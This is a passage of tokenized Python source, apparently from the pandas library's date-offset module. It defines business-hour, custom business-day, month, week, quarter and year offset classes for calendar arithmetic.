tot_seconds ( dt - op ) <EOL> if span <= businesshours : <EOL> return True <EOL> else : <EOL> return False <EOL> def _repr_attrs ( self ) : <EOL> out = super ( BusinessHourMixin , self ) . _repr_attrs ( ) <EOL> start = self . start . strftime ( '<STR_LIT>' ) <EOL> end = self . end . strftime ( '<STR_LIT>' ) <EOL> attrs = [ '<STR_LIT>' . format ( prefix = self . _prefix , <EOL> start = start , end = end ) ] <EOL> out += '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( attrs ) <EOL> return out <EOL> class BusinessHour ( BusinessHourMixin , SingleConstructorOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT>' <EOL> _anchor = <NUM_LIT:0> <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> super ( BusinessHour , self ) . __init__ ( ** kwds ) <EOL> if self . n >= <NUM_LIT:0> : <EOL> nb_offset = <NUM_LIT:1> <EOL> else : <EOL> nb_offset = - <NUM_LIT:1> <EOL> self . next_bday = BusinessDay ( n = nb_offset ) <EOL> class CustomBusinessDay ( BusinessDay ) : <EOL> """<STR_LIT>""" <EOL> _cacheable = False <EOL> _prefix = '<STR_LIT:C>' <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , weekmask = '<STR_LIT>' , <EOL> holidays = None , calendar = None , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> calendar , holidays = self . get_calendar ( weekmask = weekmask , <EOL> holidays = holidays , <EOL> calendar = calendar ) <EOL> self . kwds [ '<STR_LIT>' ] = self . weekmask = weekmask <EOL> self . kwds [ '<STR_LIT>' ] = self . holidays = holidays <EOL> self . kwds [ '<STR_LIT>' ] = self . calendar = calendar <EOL> def get_calendar ( self , weekmask , holidays , calendar ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( calendar , np . busdaycalendar ) : <EOL> if not holidays : <EOL> holidays = tuple ( calendar . 
holidays ) <EOL> elif not isinstance ( holidays , tuple ) : <EOL> holidays = tuple ( holidays ) <EOL> else : <EOL> pass <EOL> return calendar , holidays <EOL> if holidays is None : <EOL> holidays = [ ] <EOL> try : <EOL> holidays = holidays + calendar . holidays ( ) . tolist ( ) <EOL> except AttributeError : <EOL> pass <EOL> holidays = [ self . _to_dt64 ( dt , dtype = '<STR_LIT>' ) for dt in <EOL> holidays ] <EOL> holidays = tuple ( sorted ( holidays ) ) <EOL> kwargs = { '<STR_LIT>' : weekmask } <EOL> if holidays : <EOL> kwargs [ '<STR_LIT>' ] = holidays <EOL> busdaycalendar = np . busdaycalendar ( ** kwargs ) <EOL> return busdaycalendar , holidays <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state = self . __dict__ . copy ( ) <EOL> del state [ '<STR_LIT>' ] <EOL> try : <EOL> state [ '<STR_LIT>' ] . pop ( '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> return state <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ = state <EOL> calendar , holidays = self . get_calendar ( weekmask = self . weekmask , <EOL> holidays = self . holidays , <EOL> calendar = None ) <EOL> self . kwds [ '<STR_LIT>' ] = self . calendar = calendar <EOL> self . kwds [ '<STR_LIT>' ] = self . holidays = holidays <EOL> self . kwds [ '<STR_LIT>' ] = state [ '<STR_LIT>' ] <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> if self . n <= <NUM_LIT:0> : <EOL> roll = '<STR_LIT>' <EOL> else : <EOL> roll = '<STR_LIT>' <EOL> if isinstance ( other , datetime ) : <EOL> date_in = other <EOL> np_dt = np . datetime64 ( date_in . date ( ) ) <EOL> np_incr_dt = np . busday_offset ( np_dt , self . n , roll = roll , <EOL> busdaycal = self . calendar ) <EOL> dt_date = np_incr_dt . astype ( datetime ) <EOL> result = datetime . combine ( dt_date , date_in . time ( ) ) <EOL> if self . offset : <EOL> result = result + self . offset <EOL> return result <EOL> elif isinstance ( other , ( timedelta , Tick ) ) : <EOL> return BDay ( self . n , offset = self . 
offset + other , <EOL> normalize = self . normalize ) <EOL> else : <EOL> raise ApplyTypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def apply_index ( self , i ) : <EOL> raise NotImplementedError <EOL> @ staticmethod <EOL> def _to_dt64 ( dt , dtype = '<STR_LIT>' ) : <EOL> if getattr ( dt , '<STR_LIT>' , None ) is not None : <EOL> i8 = tslib . pydt_to_i8 ( dt ) <EOL> dt = tslib . tz_convert_single ( i8 , '<STR_LIT>' , dt . tzinfo ) <EOL> dt = Timestamp ( dt ) <EOL> dt = np . datetime64 ( dt ) <EOL> if dt . dtype . name != dtype : <EOL> dt = dt . astype ( dtype ) <EOL> return dt <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> day64 = self . _to_dt64 ( dt , '<STR_LIT>' ) <EOL> return np . is_busday ( day64 , busdaycal = self . calendar ) <EOL> class CustomBusinessHour ( BusinessHourMixin , SingleConstructorOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT>' <EOL> _anchor = <NUM_LIT:0> <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , weekmask = '<STR_LIT>' , <EOL> holidays = None , calendar = None , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> super ( CustomBusinessHour , self ) . __init__ ( ** kwds ) <EOL> if self . n >= <NUM_LIT:0> : <EOL> nb_offset = <NUM_LIT:1> <EOL> else : <EOL> nb_offset = - <NUM_LIT:1> <EOL> self . next_bday = CustomBusinessDay ( n = nb_offset , <EOL> weekmask = weekmask , <EOL> holidays = holidays , <EOL> calendar = calendar ) <EOL> self . kwds [ '<STR_LIT>' ] = self . next_bday . weekmask <EOL> self . kwds [ '<STR_LIT>' ] = self . next_bday . holidays <EOL> self . kwds [ '<STR_LIT>' ] = self . next_bday . calendar <EOL> class MonthOffset ( SingleConstructorOffset ) : <EOL> _adjust_dst = True <EOL> @ property <EOL> def name ( self ) : <EOL> if self . isAnchored : <EOL> return self . rule_code <EOL> else : <EOL> return "<STR_LIT>" % ( self . rule_code , _int_to_month [ self . 
n ] ) <EOL> class MonthEnd ( MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> _ , days_in_month = tslib . monthrange ( other . year , other . month ) <EOL> if other . day != days_in_month : <EOL> other = other + relativedelta ( months = - <NUM_LIT:1> , day = <NUM_LIT> ) <EOL> if n <= <NUM_LIT:0> : <EOL> n = n + <NUM_LIT:1> <EOL> other = other + relativedelta ( months = n , day = <NUM_LIT> ) <EOL> return other <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> shifted = tslib . shift_months ( i . asi8 , self . n , '<STR_LIT:end>' ) <EOL> return i . _shallow_copy ( shifted ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> days_in_month = tslib . monthrange ( dt . year , dt . month ) [ <NUM_LIT:1> ] <EOL> return dt . day == days_in_month <EOL> _prefix = '<STR_LIT:M>' <EOL> class MonthBegin ( MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> if other . day > <NUM_LIT:1> and n <= <NUM_LIT:0> : <EOL> n += <NUM_LIT:1> <EOL> return other + relativedelta ( months = n , day = <NUM_LIT:1> ) <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> shifted = tslib . shift_months ( i . asi8 , self . n , '<STR_LIT:start>' ) <EOL> return i . _shallow_copy ( shifted ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt . day == <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> class BusinessMonthEnd ( MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , days_in_month = tslib . monthrange ( other . year , other . 
month ) <EOL> lastBDay = days_in_month - max ( ( ( wkday + days_in_month - <NUM_LIT:1> ) <EOL> % <NUM_LIT:7> ) - <NUM_LIT:4> , <NUM_LIT:0> ) <EOL> if n > <NUM_LIT:0> and not other . day >= lastBDay : <EOL> n = n - <NUM_LIT:1> <EOL> elif n <= <NUM_LIT:0> and other . day > lastBDay : <EOL> n = n + <NUM_LIT:1> <EOL> other = other + relativedelta ( months = n , day = <NUM_LIT> ) <EOL> if other . weekday ( ) > <NUM_LIT:4> : <EOL> other = other - BDay ( ) <EOL> return other <EOL> _prefix = '<STR_LIT>' <EOL> class BusinessMonthBegin ( MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , _ = tslib . monthrange ( other . year , other . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> if other . day > first and n <= <NUM_LIT:0> : <EOL> n += <NUM_LIT:1> <EOL> elif other . day < first and n > <NUM_LIT:0> : <EOL> other = other + timedelta ( days = first - other . day ) <EOL> n -= <NUM_LIT:1> <EOL> other = other + relativedelta ( months = n ) <EOL> wkday , _ = tslib . monthrange ( other . year , other . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> result = datetime ( other . year , other . month , first , <EOL> other . hour , other . minute , <EOL> other . second , other . microsecond ) <EOL> return result <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> first_weekday , _ = tslib . monthrange ( dt . year , dt . month ) <EOL> if first_weekday == <NUM_LIT:5> : <EOL> return dt . day == <NUM_LIT:3> <EOL> elif first_weekday == <NUM_LIT:6> : <EOL> return dt . day == <NUM_LIT:2> <EOL> else : <EOL> return dt . 
day == <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> class CustomBusinessMonthEnd ( BusinessMixin , MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> _cacheable = False <EOL> _prefix = '<STR_LIT>' <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , weekmask = '<STR_LIT>' , <EOL> holidays = None , calendar = None , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> self . cbday = CustomBusinessDay ( n = self . n , normalize = normalize , <EOL> weekmask = weekmask , holidays = holidays , <EOL> calendar = calendar , ** kwds ) <EOL> self . m_offset = MonthEnd ( n = <NUM_LIT:1> , normalize = normalize , ** kwds ) <EOL> self . kwds [ '<STR_LIT>' ] = self . cbday . calendar <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> cur_mend = self . m_offset . rollforward ( other ) <EOL> cur_cmend = self . cbday . rollback ( cur_mend ) <EOL> if n == <NUM_LIT:0> and other != cur_cmend : <EOL> n += <NUM_LIT:1> <EOL> if other < cur_cmend and n >= <NUM_LIT:1> : <EOL> n -= <NUM_LIT:1> <EOL> elif other > cur_cmend and n <= - <NUM_LIT:1> : <EOL> n += <NUM_LIT:1> <EOL> new = cur_mend + n * self . m_offset <EOL> result = self . cbday . rollback ( new ) <EOL> return result <EOL> class CustomBusinessMonthBegin ( BusinessMixin , MonthOffset ) : <EOL> """<STR_LIT>""" <EOL> _cacheable = False <EOL> _prefix = '<STR_LIT>' <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , weekmask = '<STR_LIT>' , <EOL> holidays = None , calendar = None , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> self . cbday = CustomBusinessDay ( n = self . n , normalize = normalize , <EOL> weekmask = weekmask , holidays = holidays , <EOL> calendar = calendar , ** kwds ) <EOL> self . 
m_offset = MonthBegin ( n = <NUM_LIT:1> , normalize = normalize , ** kwds ) <EOL> self . kwds [ '<STR_LIT>' ] = self . cbday . calendar <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> dt_in = other <EOL> cur_mbegin = self . m_offset . rollback ( dt_in ) <EOL> cur_cmbegin = self . cbday . rollforward ( cur_mbegin ) <EOL> if n == <NUM_LIT:0> and dt_in != cur_cmbegin : <EOL> n += <NUM_LIT:1> <EOL> if dt_in > cur_cmbegin and n <= - <NUM_LIT:1> : <EOL> n += <NUM_LIT:1> <EOL> elif dt_in < cur_cmbegin and n >= <NUM_LIT:1> : <EOL> n -= <NUM_LIT:1> <EOL> new = cur_mbegin + n * self . m_offset <EOL> result = self . cbday . rollforward ( new ) <EOL> return result <EOL> class Week ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . weekday = kwds . get ( '<STR_LIT>' , None ) <EOL> if self . weekday is not None : <EOL> if self . weekday < <NUM_LIT:0> or self . weekday > <NUM_LIT:6> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . weekday ) <EOL> self . _inc = timedelta ( weeks = <NUM_LIT:1> ) <EOL> self . kwds = kwds <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> and self . weekday is not None ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> base = other <EOL> if self . weekday is None : <EOL> return other + self . n * self . _inc <EOL> if self . n > <NUM_LIT:0> : <EOL> k = self . n <EOL> otherDay = other . weekday ( ) <EOL> if otherDay != self . weekday : <EOL> other = other + timedelta ( ( self . weekday - otherDay ) % <NUM_LIT:7> ) <EOL> k = k - <NUM_LIT:1> <EOL> other = other <EOL> for i in range ( k ) : <EOL> other = other + self . _inc <EOL> else : <EOL> k = self . n <EOL> otherDay = other . weekday ( ) <EOL> if otherDay != self . weekday : <EOL> other = other + timedelta ( ( self . 
weekday - otherDay ) % <NUM_LIT:7> ) <EOL> for i in range ( - k ) : <EOL> other = other - self . _inc <EOL> other = datetime ( other . year , other . month , other . day , <EOL> base . hour , base . minute , base . second , base . microsecond ) <EOL> return other <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> if self . weekday is None : <EOL> return ( ( i . to_period ( '<STR_LIT>' ) + self . n ) . to_timestamp ( ) + <EOL> i . to_perioddelta ( '<STR_LIT>' ) ) <EOL> else : <EOL> return self . _end_apply_index ( i , self . freqstr ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt . weekday ( ) == self . weekday <EOL> _prefix = '<STR_LIT>' <EOL> @ property <EOL> def rule_code ( self ) : <EOL> suffix = '<STR_LIT>' <EOL> if self . weekday is not None : <EOL> suffix = '<STR_LIT>' % ( _int_to_weekday [ self . weekday ] ) <EOL> return self . _prefix + suffix <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> if not suffix : <EOL> weekday = None <EOL> else : <EOL> weekday = _weekday_to_int [ suffix ] <EOL> return cls ( weekday = weekday ) <EOL> class WeekDay ( object ) : <EOL> MON = <NUM_LIT:0> <EOL> TUE = <NUM_LIT:1> <EOL> WED = <NUM_LIT:2> <EOL> THU = <NUM_LIT:3> <EOL> FRI = <NUM_LIT:4> <EOL> SAT = <NUM_LIT:5> <EOL> SUN = <NUM_LIT:6> <EOL> _int_to_weekday = { <EOL> WeekDay . MON : '<STR_LIT>' , <EOL> WeekDay . TUE : '<STR_LIT>' , <EOL> WeekDay . WED : '<STR_LIT>' , <EOL> WeekDay . THU : '<STR_LIT>' , <EOL> WeekDay . FRI : '<STR_LIT>' , <EOL> WeekDay . SAT : '<STR_LIT>' , <EOL> WeekDay . SUN : '<STR_LIT>' <EOL> } <EOL> _weekday_to_int = dict ( ( v , k ) for k , v in _int_to_weekday . items ( ) ) <EOL> class WeekOfMonth ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . 
weekday = kwds [ '<STR_LIT>' ] <EOL> self . week = kwds [ '<STR_LIT>' ] <EOL> if self . n == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if self . weekday < <NUM_LIT:0> or self . weekday > <NUM_LIT:6> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . weekday ) <EOL> if self . week < <NUM_LIT:0> or self . week > <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . week ) <EOL> self . kwds = kwds <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> base = other <EOL> offsetOfMonth = self . getOffsetOfMonth ( other ) <EOL> if offsetOfMonth > other : <EOL> if self . n > <NUM_LIT:0> : <EOL> months = self . n - <NUM_LIT:1> <EOL> else : <EOL> months = self . n <EOL> elif offsetOfMonth == other : <EOL> months = self . n <EOL> else : <EOL> if self . n > <NUM_LIT:0> : <EOL> months = self . n <EOL> else : <EOL> months = self . n + <NUM_LIT:1> <EOL> other = self . getOffsetOfMonth ( <EOL> other + relativedelta ( months = months , day = <NUM_LIT:1> ) ) <EOL> other = datetime ( other . year , other . month , other . day , base . hour , <EOL> base . minute , base . second , base . microsecond ) <EOL> return other <EOL> def getOffsetOfMonth ( self , dt ) : <EOL> w = Week ( weekday = self . weekday ) <EOL> d = datetime ( dt . year , dt . month , <NUM_LIT:1> , tzinfo = dt . tzinfo ) <EOL> d = w . rollforward ( d ) <EOL> for i in range ( self . week ) : <EOL> d = w . apply ( d ) <EOL> return d <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> d = datetime ( dt . year , dt . month , dt . day , tzinfo = dt . tzinfo ) <EOL> return d == self . getOffsetOfMonth ( dt ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return '<STR_LIT>' % ( self . _prefix , self . week + <NUM_LIT:1> , <EOL> _int_to_weekday . get ( self . 
weekday , '<STR_LIT>' ) ) <EOL> _prefix = '<STR_LIT>' <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> if not suffix : <EOL> raise ValueError ( "<STR_LIT>" % ( cls . _prefix ) ) <EOL> week = int ( suffix [ <NUM_LIT:0> ] ) - <NUM_LIT:1> <EOL> weekday = _weekday_to_int [ suffix [ <NUM_LIT:1> : ] ] <EOL> return cls ( week = week , weekday = weekday ) <EOL> class LastWeekOfMonth ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . weekday = kwds [ '<STR_LIT>' ] <EOL> if self . n == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if self . weekday < <NUM_LIT:0> or self . weekday > <NUM_LIT:6> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> self . weekday ) <EOL> self . kwds = kwds <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> offsetOfMonth = self . getOffsetOfMonth ( other ) <EOL> if offsetOfMonth > other : <EOL> if self . n > <NUM_LIT:0> : <EOL> months = self . n - <NUM_LIT:1> <EOL> else : <EOL> months = self . n <EOL> elif offsetOfMonth == other : <EOL> months = self . n <EOL> else : <EOL> if self . n > <NUM_LIT:0> : <EOL> months = self . n <EOL> else : <EOL> months = self . n + <NUM_LIT:1> <EOL> return self . getOffsetOfMonth ( <EOL> other + relativedelta ( months = months , day = <NUM_LIT:1> ) ) <EOL> def getOffsetOfMonth ( self , dt ) : <EOL> m = MonthEnd ( ) <EOL> d = datetime ( dt . year , dt . month , <NUM_LIT:1> , dt . hour , dt . minute , <EOL> dt . second , dt . microsecond , tzinfo = dt . tzinfo ) <EOL> eom = m . rollforward ( d ) <EOL> w = Week ( weekday = self . weekday ) <EOL> return w . rollback ( eom ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt == self . getOffsetOfMonth ( dt ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return '<STR_LIT>' % ( self . _prefix , _int_to_weekday . 
get ( self . weekday , '<STR_LIT>' ) ) <EOL> _prefix = '<STR_LIT>' <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> if not suffix : <EOL> raise ValueError ( "<STR_LIT>" % ( cls . _prefix ) ) <EOL> weekday = _weekday_to_int [ suffix ] <EOL> return cls ( weekday = weekday ) <EOL> class QuarterOffset ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _default_startingMonth = None <EOL> _from_name_startingMonth = None <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . startingMonth = kwds . get ( '<STR_LIT>' , <EOL> self . _default_startingMonth ) <EOL> self . kwds = kwds <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> and self . startingMonth is not None ) <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> kwargs = { } <EOL> if suffix : <EOL> kwargs [ '<STR_LIT>' ] = _month_to_int [ suffix ] <EOL> else : <EOL> if cls . _from_name_startingMonth is not None : <EOL> kwargs [ '<STR_LIT>' ] = cls . _from_name_startingMonth <EOL> return cls ( ** kwargs ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return '<STR_LIT>' % ( self . _prefix , _int_to_month [ self . startingMonth ] ) <EOL> class BQuarterEnd ( QuarterOffset ) : <EOL> """<STR_LIT>""" <EOL> _outputName = '<STR_LIT>' <EOL> _default_startingMonth = <NUM_LIT:3> <EOL> _from_name_startingMonth = <NUM_LIT:12> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> base = other <EOL> other = datetime ( other . year , other . month , other . day , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> wkday , days_in_month = tslib . monthrange ( other . year , other . month ) <EOL> lastBDay = days_in_month - max ( ( ( wkday + days_in_month - <NUM_LIT:1> ) <EOL> % <NUM_LIT:7> ) - <NUM_LIT:4> , <NUM_LIT:0> ) <EOL> monthsToGo = <NUM_LIT:3> - ( ( other . 
month - self . startingMonth ) % <NUM_LIT:3> ) <EOL> if monthsToGo == <NUM_LIT:3> : <EOL> monthsToGo = <NUM_LIT:0> <EOL> if n > <NUM_LIT:0> and not ( other . day >= lastBDay and monthsToGo == <NUM_LIT:0> ) : <EOL> n = n - <NUM_LIT:1> <EOL> elif n <= <NUM_LIT:0> and other . day > lastBDay and monthsToGo == <NUM_LIT:0> : <EOL> n = n + <NUM_LIT:1> <EOL> other = other + relativedelta ( months = monthsToGo + <NUM_LIT:3> * n , day = <NUM_LIT> ) <EOL> other = tslib . _localize_pydatetime ( other , base . tzinfo ) <EOL> if other . weekday ( ) > <NUM_LIT:4> : <EOL> other = other - BDay ( ) <EOL> return other <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> modMonth = ( dt . month - self . startingMonth ) % <NUM_LIT:3> <EOL> return BMonthEnd ( ) . onOffset ( dt ) and modMonth == <NUM_LIT:0> <EOL> _int_to_month = tslib . _MONTH_ALIASES <EOL> _month_to_int = dict ( ( v , k ) for k , v in _int_to_month . items ( ) ) <EOL> class BQuarterBegin ( QuarterOffset ) : <EOL> _outputName = "<STR_LIT>" <EOL> _default_startingMonth = <NUM_LIT:3> <EOL> _from_name_startingMonth = <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , _ = tslib . monthrange ( other . year , other . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> monthsSince = ( other . month - self . startingMonth ) % <NUM_LIT:3> <EOL> if n <= <NUM_LIT:0> and monthsSince != <NUM_LIT:0> : <EOL> monthsSince = monthsSince - <NUM_LIT:3> <EOL> if n <= <NUM_LIT:0> and ( monthsSince == <NUM_LIT:0> and other . day > first ) : <EOL> n = n + <NUM_LIT:1> <EOL> elif n > <NUM_LIT:0> and ( monthsSince == <NUM_LIT:0> and other . day < first ) : <EOL> n = n - <NUM_LIT:1> <EOL> other = other + relativedelta ( months = <NUM_LIT:3> * n - monthsSince ) <EOL> wkday , _ = tslib . monthrange ( other . year , other . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> result = datetime ( other . 
year , other . month , first , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> return result <EOL> class QuarterEnd ( QuarterOffset ) : <EOL> """<STR_LIT>""" <EOL> _outputName = '<STR_LIT>' <EOL> _default_startingMonth = <NUM_LIT:3> <EOL> _prefix = '<STR_LIT>' <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . startingMonth = kwds . get ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> self . kwds = kwds <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> and self . startingMonth is not None ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> other = datetime ( other . year , other . month , other . day , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> wkday , days_in_month = tslib . monthrange ( other . year , other . month ) <EOL> monthsToGo = <NUM_LIT:3> - ( ( other . month - self . startingMonth ) % <NUM_LIT:3> ) <EOL> if monthsToGo == <NUM_LIT:3> : <EOL> monthsToGo = <NUM_LIT:0> <EOL> if n > <NUM_LIT:0> and not ( other . day >= days_in_month and monthsToGo == <NUM_LIT:0> ) : <EOL> n = n - <NUM_LIT:1> <EOL> other = other + relativedelta ( months = monthsToGo + <NUM_LIT:3> * n , day = <NUM_LIT> ) <EOL> return other <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> return self . _end_apply_index ( i , self . freqstr ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> modMonth = ( dt . month - self . startingMonth ) % <NUM_LIT:3> <EOL> return MonthEnd ( ) . onOffset ( dt ) and modMonth == <NUM_LIT:0> <EOL> class QuarterBegin ( QuarterOffset ) : <EOL> _outputName = '<STR_LIT>' <EOL> _default_startingMonth = <NUM_LIT:3> <EOL> _from_name_startingMonth = <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> and self . 
startingMonth is not None ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , days_in_month = tslib . monthrange ( other . year , other . month ) <EOL> monthsSince = ( other . month - self . startingMonth ) % <NUM_LIT:3> <EOL> if n <= <NUM_LIT:0> and monthsSince != <NUM_LIT:0> : <EOL> monthsSince = monthsSince - <NUM_LIT:3> <EOL> if n <= <NUM_LIT:0> and ( monthsSince == <NUM_LIT:0> and other . day > <NUM_LIT:1> ) : <EOL> n = n + <NUM_LIT:1> <EOL> other = other + relativedelta ( months = <NUM_LIT:3> * n - monthsSince , day = <NUM_LIT:1> ) <EOL> return other <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> freq_month = <NUM_LIT:12> if self . startingMonth == <NUM_LIT:1> else self . startingMonth - <NUM_LIT:1> <EOL> freqstr = '<STR_LIT>' % ( _int_to_month [ freq_month ] , ) <EOL> return self . _beg_apply_index ( i , freqstr ) <EOL> class YearOffset ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . month = kwds . get ( '<STR_LIT>' , self . _default_month ) <EOL> if self . month < <NUM_LIT:1> or self . month > <NUM_LIT:12> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> DateOffset . __init__ ( self , n = n , normalize = normalize , ** kwds ) <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> kwargs = { } <EOL> if suffix : <EOL> kwargs [ '<STR_LIT>' ] = _month_to_int [ suffix ] <EOL> return cls ( ** kwargs ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return '<STR_LIT>' % ( self . _prefix , _int_to_month [ self . month ] ) <EOL> class BYearEnd ( YearOffset ) : <EOL> """<STR_LIT>""" <EOL> _outputName = '<STR_LIT>' <EOL> _default_month = <NUM_LIT:12> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , days_in_month = tslib . monthrange ( other . year , self . 
